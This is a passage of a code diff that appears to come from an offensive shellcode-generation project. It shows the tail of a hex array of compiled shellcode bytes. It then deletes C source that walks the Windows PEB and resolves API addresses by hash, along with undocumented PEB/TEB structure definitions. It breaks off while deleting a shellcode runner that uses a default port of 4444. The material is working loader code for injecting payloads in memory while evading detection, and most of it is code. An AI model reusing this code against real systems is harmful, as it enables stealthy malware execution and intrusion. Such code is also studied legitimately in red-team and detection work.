574 0x00, 0x8b, 0x44, 0x24, 0x04, 0x2b, 0x44, 0x24, 0x08, 0xc3, 0x8b, 0x44,
575 0x24, 0x04, 0x99, 0xf7, 0x7c, 0x24, 0x08, 0xc3, 0xe8, 0x00, 0x00, 0x00,
576 0x00, 0x58, 0x83, 0xe8, 0x05, 0xc3, 0x55, 0x8b, 0xec, 0x64, 0xa1, 0x30,
577 0x00, 0x00, 0x00, 0x33, 0xc9, 0x56, 0x8b, 0x40, 0x0c, 0x8b, 0x70, 0x0c,
578 0xeb, 0x20, 0x85, 0xc9, 0x75, 0x23, 0xff, 0x75, 0x18, 0xff, 0x75, 0x14,
579 0xff, 0x75, 0x10, 0xff, 0x75, 0x0c, 0x50, 0xff, 0x75, 0x08, 0xe8, 0x8c,
580 0xed, 0xff, 0xff, 0x8b, 0x36, 0x83, 0xc4, 0x18, 0x8b, 0xc8, 0x8b, 0x46,
581 0x18, 0x85, 0xc0, 0x75, 0xd9, 0x8b, 0xc1, 0x5e, 0x5d, 0xc3, 0x8b, 0x44,
582 0x24, 0x08, 0x56, 0x8b, 0x74, 0x24, 0x08, 0x8a, 0x16, 0x84, 0xd2, 0x74,
583 0x14, 0x8a, 0xca, 0x2b, 0xf0, 0x8a, 0xd1, 0x3a, 0x08, 0x75, 0x0a, 0x40,
584 0x8a, 0x0c, 0x06, 0x8a, 0xd1, 0x84, 0xc9, 0x75, 0xf0, 0x0f, 0xb6, 0x08,
585 0x0f, 0xb6, 0xc2, 0x2b, 0xc1, 0x5e, 0xc3, 0x83, 0xec, 0x14, 0x53, 0x8b,
586 0x5c, 0x24, 0x20, 0x33, 0xc0, 0x55, 0x8b, 0x6c, 0x24, 0x28, 0x56, 0x57,
587 0x33, 0xff, 0x89, 0x44, 0x24, 0x2c, 0x33, 0xf6, 0x89, 0x74, 0x24, 0x10,
588 0x8b, 0x4c, 0x24, 0x28, 0x8a, 0x0c, 0x08, 0x84, 0xc9, 0x74, 0x11, 0x83,
589 0xf8, 0x40, 0x74, 0x0c, 0x88, 0x4c, 0x3c, 0x14, 0x47, 0x40, 0x89, 0x44,
590 0x24, 0x2c, 0xeb, 0x57, 0x6a, 0x10, 0x58, 0x2b, 0xc7, 0x8d, 0x74, 0x24,
591 0x14, 0x50, 0x03, 0xf7, 0x6a, 0x00, 0x56, 0xe8, 0xfd, 0x01, 0x00, 0x00,
592 0x83, 0xc4, 0x0c, 0xc6, 0x06, 0x80, 0x83, 0xff, 0x0c, 0x72, 0x21, 0x55,
593 0x8d, 0x44, 0x24, 0x18, 0x53, 0x50, 0xe8, 0x5e, 0x00, 0x00, 0x00, 0x6a,
594 0x10, 0x33, 0xd8, 0x33, 0xea, 0x8d, 0x44, 0x24, 0x24, 0x6a, 0x00, 0x50,
595 0xe8, 0xd4, 0x01, 0x00, 0x00, 0x83, 0xc4, 0x18, 0x8b, 0x44, 0x24, 0x2c,
596 0x8b, 0x74, 0x24, 0x10, 0xc1, 0xe0, 0x03, 0x46, 0x6a, 0x10, 0x89, 0x44,
597 0x24, 0x24, 0x5f, 0x89, 0x74, 0x24, 0x10, 0x83, 0xff, 0x10, 0x75, 0x15,
598 0x55, 0x8d, 0x44, 0x24, 0x18, 0x53, 0x50, 0xe8, 0x21, 0x00, 0x00, 0x00,
599 0x83, 0xc4, 0x0c, 0x33, 0xd8, 0x33, 0xea, 0x33, 0xff, 0x8b, 0x44, 0x24,
600 0x2c, 0x85, 0xf6, 0x0f, 0x84, 0x67, 0xff, 0xff, 0xff, 0x5f, 0x5e, 0x8b,
601 0xd5, 0x8b, 0xc3, 0x5d, 0x5b, 0x83, 0xc4, 0x14, 0xc3, 0x83, 0xec, 0x10,
602 0x8b, 0x44, 0x24, 0x18, 0x8b, 0x54, 0x24, 0x1c, 0x53, 0x55, 0x56, 0x8b,
603 0x74, 0x24, 0x20, 0x33, 0xdb, 0x57, 0x8d, 0x7c, 0x24, 0x10, 0xa5, 0xa5,
604 0xa5, 0xa5, 0x8b, 0x4c, 0x24, 0x14, 0x8b, 0x74, 0x24, 0x1c, 0x8b, 0x6c,
605 0x24, 0x18, 0x8b, 0x7c, 0x24, 0x10, 0x89, 0x4c, 0x24, 0x28, 0x8b, 0xce,
606 0xc1, 0xc8, 0x08, 0x8b, 0x74, 0x24, 0x28, 0x03, 0xc2, 0xc1, 0xce, 0x08,
607 0x33, 0xc7, 0x03, 0xf7, 0xc1, 0xc2, 0x03, 0x33, 0xf3, 0xc1, 0xc7, 0x03,
608 0x33, 0xd0, 0x89, 0x6c, 0x24, 0x28, 0x33, 0xfe, 0x8b, 0xe9, 0x43, 0x83,
609 0xfb, 0x1b, 0x72, 0xd6, 0x5f, 0x5e, 0x5d, 0x5b, 0x83, 0xc4, 0x10, 0xc3,
610 0x8b, 0x54, 0x24, 0x10, 0x83, 0xec, 0x14, 0x53, 0x8b, 0x5c, 0x24, 0x24,
611 0x85, 0xd2, 0x0f, 0x84, 0xe8, 0x00, 0x00, 0x00, 0x8b, 0x44, 0x24, 0x20,
612 0x55, 0x33, 0xed, 0x45, 0x56, 0x8d, 0x48, 0x0f, 0x2b, 0xe8, 0x57, 0x89,
613 0x4c, 0x24, 0x10, 0x89, 0x6c, 0x24, 0x34, 0x8b, 0xf0, 0x8d, 0x7c, 0x24,
614 0x14, 0x33, 0xc9, 0xa5, 0xa5, 0xa5, 0xa5, 0x8b, 0x74, 0x24, 0x28, 0x8b,
615 0x04, 0x8e, 0x31, 0x44, 0x8c, 0x14, 0x41, 0x83, 0xf9, 0x04, 0x72, 0xf3,
616 0x8b, 0x74, 0x24, 0x20, 0x8b, 0x44, 0x24, 0x1c, 0x8b, 0x7c, 0x24, 0x18,
617 0x8b, 0x4c, 0x24, 0x14, 0xc7, 0x44, 0x24, 0x30, 0x10, 0x00, 0x00, 0x00,
618 0x03, 0xcf, 0x03, 0xc6, 0xc1, 0xc7, 0x05, 0x33, 0xf9, 0xc1, 0xc6, 0x08,
619 0x33, 0xf0, 0xc1, 0xc1, 0x10, 0x03, 0xc7, 0x03, 0xce, 0xc1, 0xc7, 0x07,
620 0xc1, 0xc6, 0x0d, 0x33, 0xf8, 0x33, 0xf1, 0xc1, 0xc0, 0x10, 0x83, 0x6c,
621 0x24, 0x30, 0x01, 0x75, 0xd7, 0x8b, 0x6c, 0x24, 0x28, 0x89, 0x4c, 0x24,
622 0x14, 0x33, 0xc9, 0x89, 0x74, 0x24, 0x20, 0x89, 0x7c, 0x24, 0x18, 0x89,
623 0x44, 0x24, 0x1c, 0x8b, 0x44, 0x8d, 0x00, 0x31, 0x44, 0x8c, 0x14, 0x41,
624 0x83, 0xf9, 0x04, 0x72, 0xf2, 0x8b, 0x6c, 0x24, 0x34, 0x8b, 0xca, 0x6a,
625 0x10, 0x58, 0x3b, 0xd0, 0x0f, 0x47, 0xc8, 0x85, 0xc9, 0x7e, 0x19, 0x8d,
626 0x7c, 0x24, 0x14, 0x8b, 0xf3, 0x2b, 0xfb, 0x8b, 0xe9, 0x8a, 0x04, 0x37,
627 0x30, 0x06, 0x46, 0x83, 0xed, 0x01, 0x75, 0xf5, 0x8b, 0x6c, 0x24, 0x34,
628 0x2b, 0xd1, 0x03, 0xd9, 0x8b, 0x4c, 0x24, 0x10, 0x80, 0x01, 0x01, 0x75,
629 0x08, 0x49, 0x8d, 0x04, 0x29, 0x85, 0xc0, 0x7f, 0xf3, 0x8b, 0x44, 0x24,
630 0x2c, 0x85, 0xd2, 0x0f, 0x85, 0x32, 0xff, 0xff, 0xff, 0x5f, 0x5e, 0x5d,
631 0x5b, 0x83, 0xc4, 0x14, 0xc3, 0x8b, 0x54, 0x24, 0x0c, 0x8b, 0x44, 0x24,
632 0x04, 0x56, 0x8b, 0xf0, 0x85, 0xd2, 0x74, 0x13, 0x57, 0x8b, 0x7c, 0x24,
633 0x10, 0x2b, 0xf8, 0x8a, 0x0c, 0x37, 0x88, 0x0e, 0x46, 0x83, 0xea, 0x01,
634 0x75, 0xf5, 0x5f, 0x5e, 0xc3, 0x8a, 0x44, 0x24, 0x08, 0x8b, 0x4c, 0x24,
635 0x0c, 0x57, 0x8b, 0x7c, 0x24, 0x08, 0xf3, 0xaa, 0x8b, 0x44, 0x24, 0x08,
636 0x5f, 0xc3};
637
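--- a/payload/peb.c
+++ /dev/null
@@ -1,149 +0,0 @@
-/**
-BSD 3-Clause License
-
-Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
-
-Redistribution and use in source and binary forms, with or without
-modification, are permitted provided that the following conditions are met:
-
-* Redistributions of source code must retain the above copyright notice, this
-list of conditions and the following disclaimer.
-
-* Redistributions in binary form must reproduce the above copyright notice,
-this list of conditions and the following disclaimer in the documentation
-and/or other materials provided with the distribution.
-
-* Neither the name of the copyright holder nor the names of its
-contributors may be used to endorse or promote products derived from
-this software without specific prior written permission.
-
-THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
-AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
-IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
-DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
-FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
-DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
-SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
-CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
-OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-*/
-
-// locate address of API in export table using Maru hash function
-LPVOID FindExport(PDONUT_INSTANCE inst, LPVOID base, ULONG64 api_hash, ULONG64 iv){
-PIMAGE_DOS_HEADER dos;
-PIMAGE_NT_HEADERS nt;
-DWORD i, j, cnt, rva;
-PIMAGE_DATA_DIRECTORY dir;
-PIMAGE_EXPORT_DIRECTORY exp;
-PDWORD adr;
-PDWORD sym;
-PWORD ord;
-PCHAR api, dll, p;
-LPVOID addr=NULL;
-ULONG64 dll_hash;
-CHAR buf[MAX_PATH], dll_name[64], api_name[128];
-
-dos = (PIMAGE_DOS_HEADER)base;
-nt = RVA2VA(PIMAGE_NT_HEADERS, base, dos->e_lfanew);
-dir = (PIMAGE_DATA_DIRECTORY)nt->OptionalHeader.DataDirectory;
-rva = dir[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
-
-// if no export table, return NULL
-if (rva==0) return NULL;
-
-exp = RVA2VA(PIMAGE_EXPORT_DIRECTORY, base, rva);
-cnt = exp->NumberOfNames;
-
-// if no api names, return NULL
-if (cnt==0) return NULL;
-
-adr = RVA2VA(PDWORD,base, exp->AddressOfFunctions);
-sym = RVA2VA(PDWORD,base, exp->AddressOfNames);
-ord = RVA2VA(PWORD, base, exp->AddressOfNameOrdinals);
-dll = RVA2VA(PCHAR, base, exp->Name);
-
-// get hash of DLL string converted to lowercase
-for(i=0;dll[i]!=0;i++) {
-buf[i] = dll[i] | 0x20;
-}
-buf[i] = 0;
-dll_hash = maru(buf, iv);
-
-do {
-// calculate hash of api string
-api = RVA2VA(PCHAR, base, sym[cnt-1]);
-// xor with DLL hash and compare with hash to find
-if ((maru(api, iv) ^ dll_hash) == api_hash) {
-// return address of function
-addr = RVA2VA(LPVOID, base, adr[ord[cnt-1]]);
-
-// is this a forward reference?
-if ((PBYTE)addr >= (PBYTE)exp &&
-(PBYTE)addr < (PBYTE)exp +
-dir[IMAGE_DIRECTORY_ENTRY_EXPORT].Size)
-{
-DPRINT("%016llx is forwarded to %s",
-api_hash, (char*)addr);
-
-// copy DLL name to buffer
-p=(char*)addr;
-
-for(i=0; p[i] != 0 && i < sizeof(dll_name)-4; i++) {
-dll_name[i] = p[i];
-if(p[i] == '.') break;
-}
-
-dll_name[i+1] = 'd';
-dll_name[i+2] = 'l';
-dll_name[i+3] = 'l';
-dll_name[i+4] = 0;
-
-p += i + 1;
-
-// copy API name to buffer
-for(i=0; p[i] != 0 && i < sizeof(api_name)-1;i++) {
-api_name[i] = p[i];
-}
-api_name[i] = 0;
-
-DPRINT("Trying to load %s", dll_name);
-HMODULE hModule = inst->api.LoadLibrary(dll_name);
-
-if(hModule != NULL) {
-DPRINT("Calling GetProcAddress(%s)", api_name);
-addr = inst->api.GetProcAddress(hModule, api_name);
-} else addr = NULL;
-}
-return addr;
-}
-} while (--cnt && addr == NULL);
-
-return addr;
-}
-
-// search all modules in the PEB for API
-LPVOID xGetProcAddress(PDONUT_INSTANCE inst, ULONG64 ulHash, ULONG64 ulIV) {
-PPEB peb;
-PPEB_LDR_DATA ldr;
-PLDR_DATA_TABLE_ENTRY dte;
-LPVOID addr = NULL;
-
-#if defined(_WIN64)
-peb = (PPEB) __readgsqword(0x60);
-#else
-peb = (PPEB) __readfsdword(0x30);
-#endif
-
-ldr = (PPEB_LDR_DATA)peb->Ldr;
-
-// for each DLL loaded
-for (dte=(PLDR_DATA_TABLE_ENTRY)ldr->InLoadOrderModuleList.Flink;
-dte->DllBase != NULL && addr == NULL;
-dte=(PLDR_DATA_TABLE_ENTRY)dte->InLoadOrderLinks.Flink)
-{
-// search the export table for api
-addr = FindExport(inst, dte->DllBase, ulHash, ulIV);
-}
-return addr;
-}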
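--- a/payload/peb.h
+++ b/payload/peb.h
@@ -1,360 +0,0 @@
-/**
-BSD 3-Clause License
-
-Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
-
-Redistribution and use in source and binary forms, with or without
-modification, are permitted provided that the following conditions are met:
-
-* Redistributions of source code must retain the above copyright notice, this
-list of conditions and the following disclaimer.
-
-* Redistributions in binary form must reproduce the above copyright notice,
-this list of conditions and the following disclaimer in the documentation
-and/or other materials provided with the distribution.
-
-* Neither the name of the copyright holder nor the names of its
-contributors may be used to endorse or promote products derived from
-this software without specific prior written permission.
-
-THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
-AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
-IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
-DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
-FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
-DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
-SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
-CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
-OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-*/
-
-#ifndef PEB_H
-#define PEB_H
-
-#include <windows.h>
-
-typedef void *PPS_POST_PROCESS_INIT_ROUTINE;
-
-typedef struct _LSA_UNICODE_STRING {
-USHORT Length;
-USHORT MaximumLength;
-PWSTR Buffer;
-} LSA_UNICODE_STRING, *PLSA_UNICODE_STRING, UNICODE_STRING, *PUNICODE_STRING;
-
-typedef struct _RTL_USER_PROCESS_PARAMETERS {
-BYTE Reserved1[16];
-PVOID Reserved2[10];
-UNICODE_STRING ImagePathName;
-UNICODE_STRING CommandLine;
-} RTL_USER_PROCESS_PARAMETERS, *PRTL_USER_PROCESS_PARAMETERS;
-
-// PEB defined by rewolf
-// http://blog.rewolf.pl/blog/?p=573
-typedef struct _PEB_LDR_DATA {
-ULONG Length;
-BOOL Initialized;
-LPVOID SsHandle;
-LIST_ENTRY InLoadOrderModuleList;
-LIST_ENTRY InMemoryOrderModuleList;
-LIST_ENTRY InInitializationOrderModuleList;
-} PEB_LDR_DATA, *PPEB_LDR_DATA;
-
-typedef struct _LDR_DATA_TABLE_ENTRY
-{
-LIST_ENTRY InLoadOrderLinks;
-LIST_ENTRY InMemoryOrderLinks;
-LIST_ENTRY InInitializationOrderLinks;
-LPVOID DllBase;
-LPVOID EntryPoint;
-ULONG SizeOfImage;
-UNICODE_STRING FullDllName;
-UNICODE_STRING BaseDllName;
-} LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY;
-
-typedef struct _PEB {
-BYTE InheritedAddressSpace;
-BYTE ReadImageFileExecOptions;
-BYTE BeingDebugged;
-BYTE _SYSTEM_DEPENDENT_01;
-
-LPVOID Mutant;
-LPVOID ImageBaseAddress;
-
-PPEB_LDR_DATA Ldr;
-PRTL_USER_PROCESS_PARAMETERS ProcessParameters;
-LPVOID SubSystemData;
-LPVOID ProcessHeap;
-LPVOID FastPebLock;
-LPVOID _SYSTEM_DEPENDENT_02;
-LPVOID _SYSTEM_DEPENDENT_03;
-LPVOID _SYSTEM_DEPENDENT_04;
-union {
-LPVOID KernelCallbackTable;
-LPVOID UserSharedInfoPtr;
-};
-DWORD SystemReserved;
-DWORD _SYSTEM_DEPENDENT_05;
-LPVOID _SYSTEM_DEPENDENT_06;
-LPVOID TlsExpansionCounter;
-LPVOID TlsBitmap;
-DWORD TlsBitmapBits[2];
-LPVOID ReadOnlySharedMemoryBase;
-LPVOID _SYSTEM_DEPENDENT_07;
-LPVOID ReadOnlyStaticServerData;
-LPVOID AnsiCodePageData;
-LPVOID OemCodePageData;
-LPVOID UnicodeCaseTableData;
-DWORD NumberOfProcessors;
-union
-{
-DWORD NtGlobalFlag;
-LPVOID dummy02;
-};
-LARGE_INTEGER CriticalSectionTimeout;
-LPVOID HeapSegmentReserve;
-LPVOID HeapSegmentCommit;
-LPVOID HeapDeCommitTotalFreeThreshold;
-LPVOID HeapDeCommitFreeBlockThreshold;
-DWORD NumberOfHeaps;
-DWORD MaximumNumberOfHeaps;
-LPVOID ProcessHeaps;
-LPVOID GdiSharedHandleTable;
-LPVOID ProcessStarterHelper;
-LPVOID GdiDCAttributeList;
-LPVOID LoaderLock;
-DWORD OSMajorVersion;
-DWORD OSMinorVersion;
-WORD OSBuildNumber;
-WORD OSCSDVersion;
-DWORD OSPlatformId;
-DWORD ImageSubsystem;
-DWORD ImageSubsystemMajorVersion;
-LPVOID ImageSubsystemMinorVersion;
-union
-{
-LPVOID ImageProcessAffinityMask;
-LPVOID ActiveProcessAffinityMask;
-};
-#ifdef _WIN64
-LPVOID GdiHandleBuffer[64];
-#else
-LPVOID GdiHandleBuffer[32];
-#endif
-LPVOID PostProcessInitRoutine;
-LPVOID TlsExpansionBitmap;
-DWORD TlsExpansionBitmapBits[32];
-LPVOID SessionId;
-ULARGE_INTEGER AppCompatFlags;
-ULARGE_INTEGER AppCompatFlagsUser;
-LPVOID pShimData;
-LPVOID AppCompatInfo;
-PUNICODE_STRING CSDVersion;
-LPVOID ActivationContextData;
-LPVOID ProcessAssemblyStorageMap;
-LPVOID SystemDefaultActivationContextData;
-LPVOID SystemAssemblyStorageMap;
-LPVOID MinimumStackCommit;
-} PEB, *PPEB;
-
-
-typedef struct _CLIENT_ID {
-HANDLE UniqueProcess;
-HANDLE UniqueThread;
-} CLIENT_ID, *PCLIENT_ID;
-
-typedef struct _RTL_ACTIVATION_CONTEXT_STACK_FRAME *PRTL_ACTIVATION_CONTEXT_STACK_FRAME;
-typedef struct _ACTIVATION_CONTEXT *PACTIVATION_CONTEXT;
-typedef struct _TEB_ACTIVE_FRAME *PTEB_ACTIVE_FRAME;
-typedef struct _TEB_ACTIVE_FRAME_CONTEXT *PTEB_ACTIVE_FRAME_CONTEXT;
-
-typedef struct _RTL_ACTIVATION_CONTEXT_STACK_FRAME {
-PRTL_ACTIVATION_CONTEXT_STACK_FRAME Previous;
-PACTIVATION_CONTEXT *ActivationContext;
-ULONG Flags;
-} RTL_ACTIVATION_CONTEXT_STACK_FRAME, *PRTL_ACTIVATION_CONTEXT_STACK_FRAME;
-
-typedef struct _ACTIVATION_CONTEXT_STACK
-{
-PRTL_ACTIVATION_CONTEXT_STACK_FRAME ActiveFrame;
-LIST_ENTRY FrameListCache;
-ULONG Flags;
-ULONG NextCookieSequenceNumber;
-ULONG StackId;
-} ACTIVATION_CONTEXT_STACK, *PACTIVATION_CONTEXT_STACK;
-#define GDI_BATCH_BUFFER_SIZE 310
-
-typedef struct _GDI_TEB_BATCH
-{
-ULONG Offset;
-ULONG_PTR HDC;
-ULONG Buffer[GDI_BATCH_BUFFER_SIZE];
-} GDI_TEB_BATCH, *PGDI_TEB_BATCH;
-
-typedef struct _TEB_ACTIVE_FRAME_CONTEXT
-{
-ULONG Flags;
-PSTR FrameName;
-} TEB_ACTIVE_FRAME_CONTEXT, *PTEB_ACTIVE_FRAME_CONTEXT;
-
-typedef struct _TEB_ACTIVE_FRAME
-{
-ULONG Flags;
-struct _TEB_ACTIVE_FRAME *Previous;
-PTEB_ACTIVE_FRAME_CONTEXT Context;
-} TEB_ACTIVE_FRAME, *PTEB_ACTIVE_FRAME;
-
-#if !defined(_MSC_VER)
-typedef struct _PROCESSOR_NUMBER {
-USHORT Group;
-UCHAR Number;
-UCHAR Reserved;
-} PROCESSOR_NUMBER, *PPROCESSOR_NUMBER;
-#endif
-
-typedef struct _TEB
-{
-NT_TIB NtTib;
-
-PVOID EnvironmentPointer;
-CLIENT_ID ClientId;
-PVOID ActiveRpcHandle;
-PVOID ThreadLocalStoragePointer;
-PPEB ProcessEnvironmentBlock;
-
-ULONG LastErrorValue;
-ULONG CountOfOwnedCriticalSections;
-PVOID CsrClientThread;
-PVOID Win32ThreadInfo;
-ULONG User32Reserved[26];
-ULONG UserReserved[5];
-PVOID WOW32Reserved;
-LCID CurrentLocale;
-ULONG FpSoftwareStatusRegister;
-PVOID SystemReserved1[54];
-NTSTATUS ExceptionCode;
-PVOID ActivationContextStackPointer;
-#ifdef _M_X64
-UCHAR SpareBytes[24];
-#else
-UCHAR SpareBytes[36];
-#endif
-ULONG TxFsContext;
-
-GDI_TEB_BATCH GdiTebBatch;
-CLIENT_ID RealClientId;
-HANDLE GdiCachedProcessHandle;
-ULONG GdiClientPID;
-ULONG GdiClientTID;
-PVOID GdiThreadLocalInfo;
-ULONG_PTR Win32ClientInfo[62];
-PVOID glDispatchTable[233];
-ULONG_PTR glReserved1[29];
-PVOID glReserved2;
-PVOID glSectionInfo;
-PVOID glSection;
-PVOID glTable;
-PVOID glCurrentRC;
-PVOID glContext;
-
-NTSTATUS LastStatusValue;
-UNICODE_STRING StaticUnicodeString;
-WCHAR StaticUnicodeBuffer[261];
-
-PVOID DeallocationStack;
-PVOID TlsSlots[64];
-LIST_ENTRY TlsLinks;
-
-PVOID Vdm;
-PVOID ReservedForNtRpc;
-PVOID DbgSsReserved[2];
-
-ULONG HardErrorMode;
-#ifdef _M_X64
-PVOID Instrumentation[11];
-#else
-PVOID Instrumentation[9];
-#endif
-GUID ActivityId;
-
-PVOID SubProcessTag;
-PVOID EtwLocalData;
-PVOID EtwTraceData;
-PVOID WinSockData;
-ULONG GdiBatchCount;
-
-union
-{
-PROCESSOR_NUMBER CurrentIdealProcessor;
-ULONG IdealProcessorValue;
-struct
-{
-UCHAR ReservedPad0;
-UCHAR ReservedPad1;
-UCHAR ReservedPad2;
-UCHAR IdealProcessor;
-};
-};
-
-ULONG GuaranteedStackBytes;
-PVOID ReservedForPerf;
-PVOID ReservedForOle;
-ULONG WaitingOnLoaderLock;
-PVOID SavedPriorityState;
-ULONG_PTR SoftPatchPtr1;
-PVOID ThreadPoolData;
-PVOID *TlsExpansionSlots;
-#ifdef _M_X64
-PVOID DeallocationBStore;
-PVOID BStoreLimit;
-#endif
-ULONG MuiGeneration;
-ULONG IsImpersonating;
-PVOID NlsCache;
-PVOID pShimData;
-ULONG HeapVirtualAffinity;
-HANDLE CurrentTransactionHandle;
-PTEB_ACTIVE_FRAME ActiveFrame;
-PVOID FlsData;
-
-PVOID PreferredLanguages;
-PVOID UserPrefLanguages;
-PVOID MergedPrefLanguages;
-ULONG MuiImpersonation;
-
-union
-{
-USHORT CrossTebFlags;
-USHORT SpareCrossTebBits : 16;
-};
-union
-{
-USHORT SameTebFlags;
-struct
-{
-USHORT SafeThunkCall : 1;
-USHORT InDebugPrint : 1;
-USHORT HasFiberData : 1;
-USHORT SkipThreadAttach : 1;
-USHORT WerInShipAssertCode : 1;
-USHORT RanProcessInit : 1;
-USHORT ClonedThread : 1;
-USHORT SuppressDebugMsg : 1;
-USHORT DisableUserStackWalk : 1;
-USHORT RtlExceptionAttached : 1;
-USHORT InitialThread : 1;
-USHORT SessionAware : 1;
-USHORT SpareSameTebBits : 4;
-};
-};
-
-PVOID TxnScopeEnterCallback;
-PVOID TxnScopeExitCallback;
-PVOID TxnScopeContext;
-ULONG LockCount;
-ULONG SpareUlong0;
-PVOID ResourceRetValue;
-PVOID ReservedForWdf;
-} TEB, *PTEB;
-
-#endif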
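--- a/payload/runsc.c
+++ b/payload/runsc.c
@@ -1,734 +0,0 @@
-
-/**
-Copyright © 2016-2019 Odzhan. All Rights Reserved.
-
-Redistribution and use in source and binary forms, with or without
-modification, are permitted provided that the following conditions are
-met:
-
-1. Redistributions of source code must retain the above copyright
-notice, this list of conditions and the following disclaimer.
-
-2. Redistributions in binary form must reproduce the above copyright
-notice, this list of conditions and the following disclaimer in the
-documentation and/or other materials provided with the distribution.
-
-3. The name of the author may not be used to endorse or promote products
-derived from this software without specific prior written permission.
-
-THIS SOFTWARE IS PROVIDED BY AUTHORS "AS IS" AND ANY EXPRESS OR
-IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
-WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
-DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT,
-INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
-(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
-SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
-HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
-STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
-ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
-POSSIBILITY OF SUCH DAMAGE. */
-
-#if defined(_WIN32) || defined(_WIN64)
-#ifndef _WIN32_WINNT
-#define _WIN32_WINNT 0x0502
-#endif
-#define WIN
-#ifndef _WINSOCKAPI_
-#define _WINSOCKAPI_
-#endif
-#include <windows.h>
-#include <shlwapi.h>
-#include <winsock2.h>
-#include <ws2tcpip.h>
-#define close closesocket
-#define SHUT_RDWR SD_BOTH
-#pragma comment(lib, "ws2_32.lib")
-#pragma comment(lib, "shlwapi.lib")
-#else
-#include <unistd.h>
-#include <sys/socket.h>
-#include <sys/types.h>
-#include <sys/mman.h>
-#include <arpa/inet.h>
-#include <netdb.h>
-#include <netinet/in.h>
-#include <sys/ioctl.h>
-#include <net/if.h>
-#include <signal.h>
-#include <fcntl.h>
-#endif
-
-#include <stdio.h>
-#include <stdint.h>
-#include <string.h>
-#include <stdlib.h>
-#include <time.h>
-#include <sys/stat.h>
-
-#define RSC_CLIENT 0
-#define RSC_SERVER 1
-#define RSC_EXEC 2
-
-#define RSC_SEND 0
-#define RSC_RECV 1
-
-#define DEFAULT_PORT "4444"
-
-// structure for parameters
-typedef struct _args_t {
-int s, r;
-char *port, *address, *file;
-#ifdef WIN
-char *modules;
-#endif
-int port_nbr, ai_family, mode, sim, tx_mode, ai_addrlen, dbg;
-struct sockaddr *ai_addr;
-struct sockaddr_in v4;
-struct sockaddr_in6 v6;
-char ip[INET6_ADDRSTRLEN];
-uint32_t code_len;
-void *code;
-} args_t;
-
-#ifdef WIN
-/**F*****************************************************************/
-void xstrerror (char *fmt, ...)
-/**
-* PURPOSE : Display windows error
-*
-* RETURN : Nothing
-*
-* NOTES : None
-*
-*F*/
-{
-char *error=NULL;
-va_list arglist;
-char buffer[2048];
-DWORD dwError=GetLastError();
-
-va_start (arglist, fmt);
-wvnsprintf (buffer, sizeof(buffer) - 1, fmt, arglist);
-va_end (arglist);
-
-if (FormatMessage (
-FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM,
-NULL, dwError, MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),
-(LPSTR)&error, 0, NULL))
-{
-printf ("[ %s : %s\n", buffer, error);
-LocalFree (error);
-} else {
-printf ("[ %s : %i\n", buffer, dwError);
-}
-}
-#else
-#define xstrerror printf
-#endif
-
-char *addr2ip(args_t *p)
-{
-void *src;
-#ifdef WIN
-DWORD ip_size=INET6_ADDRSTRLEN;
-WSAAddressToString (p->ai_addr, p->ai_addrlen,
-NULL, (char*)p->ip, &ip_size);
-#else
-if (p->ai_family==AF_INET) {
-src=(void*)&p->v4.sin_addr;
-} else {
-src=(void*)&p->v6.sin6_addr;
-}
-inet_ntop(p->ai_family, src, p->ip, INET6_ADDRSTRLEN);
-#endif
-return p->ip;
-}
-
-int init_network (args_t *p)
-/**
-* PURPOSE : initialize winsock for windows, resolve network address
-*
-* RETURN : 1 for okay else 0
-*
-* NOTES : None
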